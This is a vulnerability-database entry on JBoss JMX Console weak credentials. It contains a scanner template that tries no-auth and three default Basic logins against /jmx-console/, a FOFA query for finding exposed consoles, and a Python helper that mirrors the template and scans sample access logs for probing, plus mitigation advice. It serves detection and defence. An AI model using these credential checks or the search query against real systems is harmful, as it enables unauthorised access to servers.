jboss-xml-console-unauthorized: JBoss JMX Console Weak Credential Discovery

Date: 2025-08-01 | Affected software: JBoss XML Console | PoC: public

Vulnerability description

Exploitation deploys a shell through jboss.deployment. FOFA query: "jmx-console"

PoC code [public]

id: jboss-xml-console-unauthorized

info:
  name: JBoss JMX Console Weak Credential Discovery
  author: paradessia
  severity: high
  verified: true
  description: |-
    利用jboss.deployment部署shell
    fofa: "jmx-console"
  reference:
    - https://xz.aliyun.com/t/6103
  tags: jboss,jmx,console,unauth
  created: 2023/07/07

rules:
  r0:
    request:
      method: GET
      path: /jmx-console/
    expression: response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web")
  r1:
    request:
      method: GET
      path: /jmx-console/
      headers:
        Authorization: "Basic YWRtaW46YWRtaW4="
    expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
  r2:
    request:
      method: GET
      path: /jmx-console/
      headers:
        Authorization: "Basic cm9vdDpyb290"
    expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
  r3:
    request:
      method: GET
      path: /jmx-console/
      headers:
        Authorization: "Basic YWRtaW46MTIzNDU2"
    expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
expression: r0() || r1() || r2() || r3()
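The template above has two parts: rule r0 checks whether the JMX console answers with 200 and JBoss MBean markers without any credentials at all, and r1 to r3 check whether the console accepts one of three default Basic credentials. The Python below is an added example (it is not part of the template or of its author's tooling) that mirrors those matching semantics so an operator can verify what the template would report against their own instance, decodes the Basic values to show which accounts are being tested, and adds the defender-side piece the template does not carry: a scan of web-server access logs for /jmx-console/ probing. All responses and log lines in it are constructed samples, and the `responses` and `log_text` shapes are this example's own assumptions.

```python
import base64
import re
from collections import Counter

# Rules mirrored from the template: request path, optional Authorization
# header value, and the byte markers the body must contain on a 200 response.
RULES = {
    "r0": {"path": "/jmx-console/", "auth": None,
           "markers": [b"jboss.management.local", b"jboss.web"]},
    "r1": {"path": "/jmx-console/", "auth": "Basic YWRtaW46YWRtaW4=",
           "markers": [b"JMImplementation"]},
    "r2": {"path": "/jmx-console/", "auth": "Basic cm9vdDpyb290",
           "markers": [b"JMImplementation"]},
    "r3": {"path": "/jmx-console/", "auth": "Basic YWRtaW46MTIzNDU2",
           "markers": [b"JMImplementation"]},
}


def decode_basic(header_value):
    """Return (user, password) from an HTTP Basic Authorization header value."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def rule_matches(rule, response):
    """Template semantics: response.status == 200 and every marker bcontains'd in body."""
    if response["status"] != 200:
        return False
    return all(marker in response["body"] for marker in rule["markers"])


def evaluate(responses):
    """responses maps rule id -> {"status": int, "body": bytes} (assumed shape).

    Returns the ids of the rules that fire; the template's top-level
    expression is true when this list is non-empty.
    """
    return [rid for rid, rule in RULES.items()
            if rid in responses and rule_matches(rule, responses[rid])]


# Constructed Combined Log Format lines, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /jmx-console/ HTTP/1.1" 401 1234
203.0.113.5 - - [01/Aug/2025:10:00:02 +0000] "GET /jmx-console/ HTTP/1.1" 401 1234
203.0.113.5 - admin [01/Aug/2025:10:00:03 +0000] "GET /jmx-console/ HTTP/1.1" 200 54321
198.51.100.7 - - [01/Aug/2025:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def flag_console_probes(log_text):
    """Summarise /jmx-console/ access per client: total hits and 200 responses.

    Repeated non-200 hits followed by a 200 from the same client is the
    pattern a credential-guessing run leaves in the log.
    """
    hits = Counter()
    successes = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m.group("path").startswith("/jmx-console"):
            continue
        hits[m.group("ip")] += 1
        if m.group("status") == "200":
            successes[m.group("ip")] += 1
    return {ip: {"hits": n, "successes": successes[ip]} for ip, n in hits.items()}


if __name__ == "__main__":
    for rid, rule in RULES.items():
        creds = decode_basic(rule["auth"]) if rule["auth"] else "(no credentials)"
        print(rid, rule["path"], creds)
    # Constructed responses: console open without auth, and root:root accepted.
    sample = {
        "r0": {"status": 200, "body": b"<a>jboss.management.local</a><a>jboss.web</a>"},
        "r1": {"status": 401, "body": b"Unauthorized"},
        "r2": {"status": 200, "body": b"<h2>JMImplementation</h2>"},
    }
    print("fired:", evaluate(sample))
    print("probes:", flag_console_probes(SAMPLE_LOG))
```

The two mitigations the rules point at follow directly from what they test: r0 firing means the console is reachable with no authentication at all (remove the jmx-console deployment or put it behind the JBoss security constraint), and r1 to r3 firing means a default account is still active in the realm (change or remove it). The log scan is cheap enough to run on a schedule, and any client with more than a handful of hits on the path is worth a look even when no 200 ever appears.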